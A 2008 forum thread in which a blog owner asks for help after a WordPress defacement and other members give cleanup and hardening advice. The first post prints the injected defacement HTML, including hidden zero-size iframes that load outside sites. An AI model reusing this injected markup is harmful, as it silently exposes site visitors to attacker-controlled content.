Hacked by Turkish Hacker

Discussion in 'Security' started by caj, Sep 25, 2008.

  1. #1
    [​IMG]

    I don't know why did he did it. This turkish hacker 'defaced' my news blog yesterday. Now all the 'categories in the blog disappear. All the posts now reverted to 'uncategorized' section. The worst thing - I can create new categories.

    Please help me :confused:



    Here is the code - left in the blog


    <div id="Layer1" style="position:absolute; left:0; top:0; width:1000; height:1000;
    z-index:1; background-color: #000000; layer-background-color: #ccccc; border: 1px none #000000"> <strong><font color="#777777" face="Verdana" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <title>HACKED BY iskorpitx (Turkish Hacker)</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <link href="../bcvb.css" rel="stylesheet" type="text/css">
    </head>
    <body bgcolor="#000000" text="#FFFFFF">
    &nbsp;
    <p align="center">&nbsp;</p>
    <p align="center">
    <img src="http://www.mavi1.org/forum/atam.gif" width="157" height="99"></p>
    <p align="center"><font size="5">BY iSKORPiTX; <BR> &nbsp;</font></p>

    <p align="center"><font size="5">(TURKISH HACKER)</font></p>
    <div align="center">
    <table width="53%" border="1" align="center" bordercolor="#000000" bgcolor="#000000">
    <tr>
    <td bgcolor="#000000">
    </font>
    <font color="#777777" face="Verdana" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <p align="center">

    </p>
    <p align="center">&nbsp;</p>


    <p align="center"><font size="2" face="Arial, Courier, Haettenschweiler">
    <br>
    </font></p>
    <p align="center">&nbsp;</p>
    </td>
    </tr>
    <tr>
    <td height="64" background="HAcking">
    <div align="center">&nbsp;</div></td>

    </tr>
    </table>

    </div>
    </body>
    </html>
    <iframe src="http://www.mavi1.org" frameborder="0" width="0" height="0"></iframe>
    <iframe src="http://www.mavi1.org/forum" frameborder="0" width="0" height="0"></iframe>
    <iframe src="http://www.siyamiozkan.com.tr" frameborder="0" width="0" height="0"></iframe>
    <iframe src="http://www.crosswindchurch.com/kbd/" width="0" height="0"></iframe>
     
    caj, Sep 25, 2008 IP
  2. MineMoney

    MineMoney Banned

    Messages:
    144
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #2
    wats the address
     
    MineMoney, Sep 25, 2008 IP
  3. caj

    caj Active Member

    Messages:
    748
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    75
    #3
    caj, Sep 25, 2008 IP
  4. MineMoney

    MineMoney Banned

    Messages:
    144
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #4
    Check ur .htaccess and see if the codes are there or no
     
    MineMoney, Sep 25, 2008 IP
  5. caj

    caj Active Member

    Messages:
    748
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    75
    #5

    the .htaccess is still look as usual. No additional codes have been inserted.
    The server have been reformatted by my hosting co.

    The only problem now is all the categories disappear. I still have all the posts though.

    I have done clean install of wordpress 2.6.2, disable then delete all the plugins. Nothing changed :(
     
    caj, Sep 25, 2008 IP
  6. theivo

    theivo Well-Known Member

    Messages:
    238
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    105
    #6
    why don't you ask your hosting provider to restore your site from backup first, and then to install 2.6 wordpress ?
     
    theivo, Sep 30, 2008 IP
  7. caj

    caj Active Member

    Messages:
    748
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    75
    #7
    They did. The hacker came back and defaced the site again. The site were down more than 24 hours because of the 'silly' attack.

    Any other recommendation how to avoid site from being hacked especially wordpress. I've installed plugin that detect ip address. I hope it can help.
     
    caj, Oct 5, 2008 IP
  8. ngcoders

    ngcoders Active Member

    Messages:
    206
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    55
    #8
    track down how he is doing it , look at raw logs .... not easy though.

    Best way is to find the exploit and fix it.
     
    ngcoders, Oct 5, 2008 IP
  9. hostsvault

    hostsvault Guest

    Messages:
    143
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #9
    Ask your host if they are running mod_security or not ?
     
    hostsvault, Oct 8, 2008 IP
  10. SteveWh

    SteveWh Member

    Messages:
    74
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    48
    #10
    Find timestamps on the files that got modified, then check your access logs for who was requesting pages (or accessing the site by FTP) at the time of the attack. If you can find the attack in the logs, it will help you to discover how they got into the site. The URLs in the logs might show exactly how they executed the attack.

    If you were already using the latest WP version when the site was hacked, maybe there's yet another new vulnerability that hasn't been announced or patched yet.

    Why not switch to plain HTML pages and forget about WP?
    Here is the WP security report at Secunia: http://secunia.com/advisories/product/6745/?task=advisories
     
    SteveWh, Oct 11, 2008 IP
  11. Mxhub

    Mxhub Active Member

    Messages:
    474
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    55
    #11
    Make sure you upgradde your WP to the latest.
    I suggest backup your database and then remove all the files from your account. Reupload a complete new complete of WP! Yes, you must follow these steps.

    Because, i have found that hackers also upload some .php files to your account which you will never notice it..


    ---
    joseph
     
    Mxhub, Oct 12, 2008 IP
  12. adviceforall

    adviceforall Banned

    Messages:
    1,608
    Likes Received:
    24
    Best Answers:
    0
    Trophy Points:
    0
    #12
    i wud get better secruity on the server either apache or stuff its a bug so i wud suggest he like updatein and addin secruity patches to the apache
     
    adviceforall, Oct 12, 2008 IP
  13. scoopy82

    scoopy82 Active Member

    Messages:
    838
    Likes Received:
    45
    Best Answers:
    0
    Trophy Points:
    70
    #13
    mmmm... an iframe injection hack. What other scripts do you have uploaded to your account. Maybe something long forgotten about ? Anything like a contact form, guestbook, or image gallery ?

    Prolly too late now (all those DP'rs have hit your link) I would look thru your logs or latest visitors and look for the very long URLS. That should point you to the vulnerable script.

    And the next time you have things all cleared up... it would be very wise to change all your account / script passwords.
     
    scoopy82, Oct 12, 2008 IP
  14. [u]MuTSuZ

    [u]MuTSuZ Peon

    Messages:
    6
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #14
    One TURK against the world because we are Turkish hacker
     
    [u]MuTSuZ, Oct 12, 2008 IP
  15. hiyungnu Erdemir

    hiyungnu Erdemir Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    Live Turkish hackers, my support is limitless to Turkish hackers :D
     
    hiyungnu Erdemir, Oct 12, 2008 IP
  16. Smitten

    Smitten Well-Known Member

    Messages:
    779
    Likes Received:
    22
    Best Answers:
    0
    Trophy Points:
    148
    #16
    Same thing happened to me today in 3 of my blogs (which are running from the same web host. I'm actually grateful since apparently the databases remain in place. Looks to me that the attack just messed around with the index.php from each blog.

    It will probably be a major pain in the ass restoring everything to normal, but still I guess it could have been worse.
     
    Smitten, Nov 5, 2008 IP
  17. Smitten

    Smitten Well-Known Member

    Messages:
    779
    Likes Received:
    22
    Best Answers:
    0
    Trophy Points:
    148
    #17
    Also, I was using the latest wordpress in all 3 blogs...
     
    Smitten, Nov 5, 2008 IP
  18. mill123

    mill123 Active Member

    Messages:
    631
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    58
    #18
    gah i got done today!
     
    mill123, Nov 26, 2008 IP
  19. caj

    caj Active Member

    Messages:
    748
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    75
    #19
    what's that suppose to mean? you're adding another post count?
     
    caj, Nov 27, 2008 IP
  20. mill123

    mill123 Active Member

    Messages:
    631
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    58
    #20
    err. possibly it means i got hacked by the very hacker this entire thread is about?
     
    mill123, Nov 27, 2008 IP